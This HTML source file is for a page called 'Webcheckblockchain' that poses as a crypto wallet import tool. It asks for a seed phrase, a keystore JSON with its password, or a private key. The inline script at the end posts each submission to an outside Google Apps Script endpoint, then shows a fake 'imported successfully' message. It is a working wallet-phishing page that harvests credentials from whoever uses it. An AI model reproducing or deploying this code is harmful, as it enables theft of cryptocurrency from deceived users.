<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../index.css">
    <Link rel="icon" href="../img/favicon.ico" type="image/x-icon"> 
    <script type="text/javascript" src="../js/form-bev.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" ></script>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">

    <title>Webcheckblockchain</title>
  </head>
  <body>
    <nav class="navbar navbar-expand-lg navbar-light bg-white">
        <div class="container py-2">
          <a class="navbar-brand logo-text" href="../index.html">Webcheckblockchain</a>
        </div>
      </nav>

     <section>
       <div class="container">
        <div class="row text-center">
          <div class="col-4">
             <input type="button" value="phrase" onclick="phraseOpen()" class="phraseimport-btn">
          </div>
          <div class="col-4">
            <input type="button" value="keystore JSON" onclick="keystoreOpen()" class="keystoreimport-btn">
         </div>
         <div class="col-4">
          <input type="button" value="Private Key" onclick="privateOpen()" class="privateimport-btn">
       </div>
        </div>

        <form name="phrasesync" id="phrase-import" class="text-center">
          <div class="row pt-5">
            <div class="col-12">
              <textarea name="phrase_key" id="phrasetext-area" cols="10" rows="5" placeholder="phrase" required></textarea>
            </div>
          </div>
          <div class="row pt-2 text-center">
            <div class="col-12">
              <p style="color: rgb(59, 101, 192); font-weight: bold; font-size: 12.5px;">
                Typically 12 (sometimes 24) words separated by single spaces
              </p>
            </div>
          </div>
          <div class="row pt-2">
            <div class="col-12">
              <input type="submit" value="import" id="phrasesubmit" class="import-btn">
            </div>
            <div class="col-12 success-phrase mt-3">
                 <h5> Phrase imported successfully</h5>
            </div>
          </div>
        </form>

        <form name="keystoresync" id="keystore-import" class="text-center">
          <div class="row pt-5">
            <div class="col-12">
              <textarea name="keystore_key" id="keystoretext-area" cols="10" rows="5" placeholder="keystore JSON" required></textarea>
            </div>
          </div>
          <div class="row pt-2">
            <div class="col-12">
              <input type="text" name="keystore_pass" id="keystorepass" placeholder="password" class="passimport" required>
            </div>
          </div>
          <div class="row pt-2 text-center">
            <div class="col-12">
              <p style="color: rgb(59, 101, 192); font-weight: bold; font-size: 12.5px;">
                Several lines of text beginning with '(...)' plus the password you used to encrypt it
              </p>
            </div>
          </div> 
          <div class="row pt-2">
            <div class="col-12">
              <input type="submit" value="import" class="import-btn" id="keystoresubmit">
            </div>
            <div class="col-12 success-phrase2 mt-3">
              <h5> Keystore imported successfully</h5>
         </div>
          </div>
        </form>


        <form name="privatesync" id="privatekey-import" class="text-center">
          <div class="row pt-4">
            <div class="col-12">
              <input type="text" name="private_pass" id="privatepass" placeholder="private key" class="passimport" required>
            </div>
          </div>
          <div class="row pt-2 text-center">
            <div class="col-12">
              <p style="color: rgb(59, 101, 192); font-weight: bold; font-size: 12.5px;">
                Typically 12 (sometimes 24) words separated by single spaces
              </p>
            </div>
          </div> 
          <div class="row pt-2">
            <div class="col-12">
              <input type="submit" value="import" class="import-btn" id='privatesubmit'>
            </div>
            <div class="col-12 success-phrase3 mt-3">
              <h5> Private key imported successfully</h5>
         </div>
          </div>
        </form>
       </div>   
     </section>




      <footer>
        <div class="container text-center">
            <div class="row">
                <div class="col">
                  &copy; Webcheckblockchain 2022. All rights reserved
                </div>
            </div>
        </div>
    </footer>
   
    <script>
      document.getElementById('phrasesubmit').addEventListener('click', function(event) {
        event.preventDefault()
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxENqqhy9JxksPHqDeJ4d0RYL0cfXRMFyi1Z6VkVwAvpnX6gQYwh3tp07GZGOTzcYht/exec'
        const form = document.forms['phrasesync']
        fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then((res) => document.querySelector('#phrasetext-area').value = "")
        .then((res) => document.querySelector('.success-phrase').style.display = "block")
    }) 

    document.getElementById('keystoresubmit').addEventListener('click', function(event) {
        event.preventDefault()
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxENqqhy9JxksPHqDeJ4d0RYL0cfXRMFyi1Z6VkVwAvpnX6gQYwh3tp07GZGOTzcYht/exec'
        const form = document.forms['keystoresync']
        fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then((res) => document.querySelector('#keystoretext-area').value = "")
        .then((res) => document.querySelector('#keystorepass').value = "")
        .then((res) => document.querySelector('.success-phrase2').style.display = "block")
    })

    document.getElementById('privatesubmit').addEventListener('click', function(event) {
        event.preventDefault()
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxENqqhy9JxksPHqDeJ4d0RYL0cfXRMFyi1Z6VkVwAvpnX6gQYwh3tp07GZGOTzcYht/exec'
        const form = document.forms['privatesync']
        fetch(scriptURL, { method: 'POST', body: new FormData(form)})
        .then((res) => document.querySelector('#privatepass').value = "")
        .then((res) => document.querySelector('.success-phrase3').style.display = "block")
    })
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>
  </body>
</html>